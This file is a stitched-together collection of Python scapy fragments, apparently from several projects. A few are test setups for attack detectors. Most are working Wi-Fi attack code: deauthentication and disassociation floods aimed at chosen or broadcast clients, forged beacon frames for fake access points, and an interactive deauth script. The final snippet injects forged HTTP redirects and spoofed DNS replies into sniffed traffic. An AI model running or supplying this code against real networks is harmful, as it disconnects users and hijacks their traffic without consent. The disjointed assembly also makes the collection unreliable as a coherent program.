def setUp(self): """ Setup class for Deauth. """ # Packets replicating attack self.pkt1 = scapy.Dot11(subtype=12, type=0, addr1="ff:ff:ff:ff:ff:ff") self.pkt2 = scapy.Dot11(subtype=12, type=0, addr1="aa:aa:aa:aa:aa:aa") # Initialize Deauth object self.deauth = Deauth()
def setUp(self): """ Setup class for HiddenNode. """ # Packets replicating attacks self.pkt1 = scapy.Dot11(subtype=11) self.pkt2 = scapy.Dot11(subtype=12) # Initialize HiddenNode object self.hidden_node = HiddenNode()
def setUp(self): """ Setup class for FakeAccessPoint. """ # Create attack replicating packets self.pkt1 = scapy.Dot11(subtype=8, addr2="aa:bb:cc:dd:ee:ff") \ / scapy.Dot11Beacon(timestamp=10) self.pkt2 = scapy.Dot11(subtype=8, addr2="aa:bb:cc:dd:ee:ff") \ / scapy.Dot11Beacon(timestamp=9) # Initialize FakeAccessPoint object self.fake_ap = FakeAccessPoint()
def _deauth_target(self, target, packet_count): # This also works with subtype 10, "Disassociation-Frame", verified # with MBP running 10.12.4 ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11( type=0, subtype=12, addr1=target, addr2=self._ap_bssid, addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1) actually_sent = 0 for n in range(packet_count) or packet_count == -1: if not self._thread_event.isSet(): break if n % 64 == 0: time.sleep(0.1) scapy.sendp(ap_to_client_pckt) actually_sent = n print "Sent " + str(actually_sent + 1) + " packets to " + target with self._thread_lock: self._threads_finished += 1
def deauth(**kwargs): if kwargs.get("broadcast"): clients = ["ff:ff:ff:ff:ff:ff"] else: clients = kwargs.get("clients") ap = kwargs.get("ap") for i in range(kwargs.get("count")): for client in clients: deauth_pkt = sc.Dot11(addr1=client, addr2=ap, addr3=ap) / sc.Dot11Deauth() ap_deauth_pkt = sc.Dot11(addr1=ap, addr2=client, addr3=ap) / sc.Dot11Deauth() for j in range(kwargs.get("burst-size")): sc.send(deauth_pkt) if not kwargs.get("broadcast"): sc.send(ap_deauth_pkt) time.sleep(kwargs.get("sleep-time"))
def deuath(self, ap: AccessPoint): """ Sends deauth packets to a given access point. """ pkt = (scapy.RadioTap() / scapy.Dot11( addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid) / scapy.Dot11Deauth(reason=7)) while True: scapy.sendp(pkt, iface=self._interface)
def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"): global ipiw_lock ipiw_lock.acquire() # AP -> Client p1 = sc.RadioTap() / sc.Dot11( type=0, subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth( reason=5) # reason = "AP cannot handle this many stations" # Client -> AP p2 = sc.RadioTap() / sc.Dot11( type=0, subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth( reason=8) # reason = "Client is leaving" # socket (for performance) s = sc.conf.L2socket(iface=self.netifmon) for i in range(100): s.send(p1) s.send(p2) s.close() ipiw_lock.release()
def scan(self): target_mac = "28:cf:e9:1e:50:2d" gateway_mac = "0a:00:27:00:00:0e" # 802.11 frame # addr1: destination MAC # addr2: source MAC # addr3: Access Point MAC dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) # stack them up packet = scapy.RadioTap()/dot11/scapy.Dot11Deauth() # send the packet scapy.sendp(packet, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
def craft_disas_packet(sender, receiver, bssid): """ Return a disassociation packet crafted with given information :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :param bssid: The MAC address of the AccessPoint :type sender: str :type receiver: str :type bssid: str :return: A disassociation packet :rtype: scapy.layers.dot11.RadioTap """ return (scapy.RadioTap() / scapy.Dot11( type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) / scapy.Dot11Disas())
def pkt(self, info): dot11 = scapy.Dot11( type=0, subtype=8, addr1=broadcast, addr2=self.sender, addr3=self.sender ) beacon = Dot11Beacon() essid = Dot11Elt( ID=self.channel, info=info, len=len(info) ) frame = scapy.RadioTap()/dot11/beacon/essid return frame
def __init__(self, ssid, cap="ESS+privacy"): dot11 = scapy.Dot11(type=0, subtype=8, addr1=broadcast, addr2=str(scapy.RandMAC()), addr3=str(scapy.RandMAC())) beacon = scapy.Dot11Beacon(cap=cap) essid = scapy.Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) rsn = scapy.Dot11Elt(ID="RSNinfo", info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) self.pkt = scapy.RadioTap() / dot11 / beacon / essid / rsn
def disconnect_device(router_mac: str, target_mac: str, iface: str, count: int): """ Force deauthenticate a device. Args: router_mac (str): Gateway MAC address. target_mac (str): MAC address of target device. iface (str): Ethernet Interface Name. count (int): Number of packets to be sent. """ if count == 0: count = None dot11 = sc.Dot11(type=0, subtype=12, addr1=target_mac, addr2=router_mac, addr3=router_mac) packet = sc.RadioTap() / dot11 / sc.Dot11Deauth(reason=7) sc.sendp(packet, inter=0.1, count=count, iface=iface, verbose=0)
#Start program print(f"{RED}" + start) #Show intructions print( f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n" ) #Get informations from router target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ") gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ") interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ") packets = int(input(f"{CYAN}Number os packets={RESET} ")) #Create packet # 802.11 frame # addr1: destination MAC # addr2: source MAC # addr3: Access Point MAC dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) # stack them up packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7) # send the packets p = 0 while p <= packets: scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1) print(f"{YELLOW}[!] Packets send " + str(p)) #show number of send packets p += 1 print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
apNum = raw_input( "Pleas choose Ap from list above to see all devices on the AP \033[1m--enter Ap number--\033[0m" ) print("connect to: ", ap[int(apNum)]) #step 3: we scan all devices on the AP scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20) #step 4 :chose Client MAC Address to attack macNum = raw_input( "Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m" ) print("connect to: ", clients[int(macNum)]) # Access Point MAC Address ap = ap[int(apNum)] # Client MAC Address client = clients[int(macNum)] # Deauthentication Packet For Client # Use This Option Only If you Have Client MAC Address pkt1 = scapy.RadioTap() / scapy.Dot11(addr1=ap, addr2=client, addr3=client) / scapy.Dot11Deauth() t_end = time.time() + 100 while time.time() < t_end: scapy.sendp(pkt1, iface="mon0", inter=0.001) raw_input( " '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")
def pkt_callback(pkt): if pkt.haslayer(scapy.Dot11): #print("got Wifi packet") # construct fake l2 for wifi packet macl = pkt.getlayer(scapy.Dot11) l2 = scapy.RadioTap() / scapy.Dot11( addr1=macl.addr2, addr2=macl.addr1, addr3=macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP() elif pkt.haslayer(scapy.Ether): #print("got Ethernet packet") # construct fake l2 for ethernet packet macl = pkt.getlayer(scapy.Ether) l2 = scapy.Ether(dst=macl.src, src=macl.dst) else: print("protocol neither ethernet nor wifi, skipping") return if pkt.haslayer(scapy.IP): # construct fake l3 ipl = pkt.getlayer(scapy.IP) l3 = scapy.IP(src=ipl.dst, dst=ipl.src) else: #print("this is not IP packet, skipping") return if pkt.haslayer(scapy.TCP): #print("we have TCP packet") # construct fake layer 4 for TCP tcpl = pkt.getlayer(scapy.TCP) l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport) if tcpl.flags == 2: # syn return elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack if pkt.haslayer(scapy.Raw): #print("packet has some data") tcpdata = pkt.getlayer(scapy.Raw).load if tcpdata.startswith("GET "): #print("TCP data starts with GET") dsturl = helper.getdsturl(tcpdata) if dsturl is None: return print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl)) if dsturl.find('0x0a') != -1 or dsturl.find( '85.17') != -1 or dsturl.find( 'twitter') != -1 or dsturl.find( 'facebook') != -1 or dsturl.find( 'vk.com') != -1 or dsturl.find( 'blogger') != -1 or dsturl.find( 'odnoklassniki') != -1: print "inject success" return #credirpkt = redirpkt % {'url': "http://0x0a.net/" } credirpkt = redirpkt # construct reply packet pktreply = l2 / l3 / l4 pktreply.getlayer(scapy.TCP).seq = tcpl.ack pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata) pktreply.getlayer(scapy.TCP).flags = "PA" # construct fin packet finpktreply = pktreply.copy() finpktreply.getlayer(scapy.TCP).flags = "FA" finpktreply.getlayer(scapy.TCP).seq += len(credirpkt) # add redir payload to reply packet pktreply.getlayer(scapy.TCP).add_payload(credirpkt) packetbasket = [pktreply, finpktreply] # send reply packet scapy.sendp(packetbasket, verbose=0, iface=interface) print("Reply sent") return elif tcpl.flags == 17: # fin ack return elif pkt.haslayer(scapy.UDP): # construct layer 4 for UDP udpl = pkt.getlayer(scapy.UDP) l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport) if pkt.haslayer(scapy.DNS): #print("We got DNS packet") dnsl = pkt.getlayer(scapy.DNS) if dnsl.qr == 0: print("We got DNS request packet: %s" % (dnsl.qd.qname)) pktreply = l2 / l3 / l4 / scapy.DNS( id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR( rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121")) scapy.sendp([pktreply], verbose=0, iface=interface) print("Reply sent") return else: print("protocol not TCP or UDP, skipping") #pkt.show() return